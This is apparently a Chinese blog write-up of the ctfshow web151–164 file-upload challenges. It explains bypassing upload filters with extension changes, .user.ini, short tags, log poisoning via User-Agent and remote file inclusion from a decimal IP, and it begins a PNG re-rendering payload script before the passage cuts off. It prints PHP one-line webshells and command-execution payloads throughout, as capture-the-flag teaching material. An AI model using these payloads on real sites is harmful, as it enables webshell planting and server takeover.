WEB-ctfshow入门文件包含

最新推荐文章于 2025-01-29 00:39:06 发布

原创

最新推荐文章于 2025-01-29 00:39:06 发布 · 531 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#php #安全 #web安全

本文探讨了如何通过修改上传格式、文件名、内容处理和HTTP头来绕过PHP过滤，实现一句话马和远程文件包含，包括png转渲染、htaccess绕过、zip包含和日志利用等技巧。一步步揭示了在Web应用安全中的攻防策略。

web151

查看源码可以发现只能上传png图片
修改为php
在这里插入图片描述
修改上传格式为php，上传一句话马，蚁剑连接得flag

web152

后端校验
上传一句话,png文件用burp抓包
在这里插入图片描述
修改文件名后缀为php,访问被解析,蚁剑连接得flag。

web153

打开发现/upload下存在index.php文件,我们可以利用.user.ini,
前端把后缀限制去掉,accept改为file,上传user.ini
在这里插入图片描述
Content-Type修改为image/png

蚁剑连接得flag。

web154

在这里插入图片描述
提示文件内容不合规,发现过滤了php,可使用短标签

蚁剑连接得flag。

web155

按照上题做法可行
在这里插入图片描述

web156

在之前的基础上又过滤了[]，可以用{}代替。

<?=eval($_POST{1});?>

或者直接输出flag

<?=system('tac ../f*')?>

在这里插入图片描述

web157

过滤了;和{,直接命令执行可以了

<?=`tac ../fl*`?>

在这里插入图片描述

web158

和上题做法一样

<?=`tac ../fl*`?>

Web159

上题做法可继续使用

<?=`tac ../fl*`?>

web160

日志包含绕过

<?=include"/var/lo"."g/nginx/access.lo"."g"?>

先上传一个.user.ini文件，之后上传一个txt文件，内容为<?=include"/var/lo"."g/nginx/access.lo"."g"?>考虑到过滤log，之后User-Agent修改为<?php eval($_POST[1]);?>
蚁剑连接得flag。
在这里插入图片描述

web161

上传ini文件时加上GIF89A
在这里插入图片描述

修改User-Agent为<?php eval($_POST[1]);?>，蚁剑连接得flag。

web162

过滤了.，所以不能利用日志包含了，先正常上传.user.ini
在这里插入图片描述
因为不能有.所以将IP转换为十进制，默认路由就是一句话木马

如果是包含远程服务器上的PHP文件，那么得到的是被远程服务器解析过的PHP，所以在写一句话木马的时候就不要做成.php的文件，一般包含.txt的文件

<?=include"http://3024726958"?>

得到flag
在这里插入图片描述

web163

同上用远程文件包含

GIF89a?
auto_append_file=http://6024326456

web164

考点： png二次渲染

利用下方代码进行png二次渲染绕过

<?php
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
    0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
    0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
    0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
    0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
    0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
    0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
    0x66, 0x44, 0x50, 0x33);
 
 
 
$img = imagecreatetruecolor(32, 32);
 
for ($y = 0; $y < sizeof($p); $y += 3) {
   
   
    $r = $p[$y];
    $g = $p[$y+1]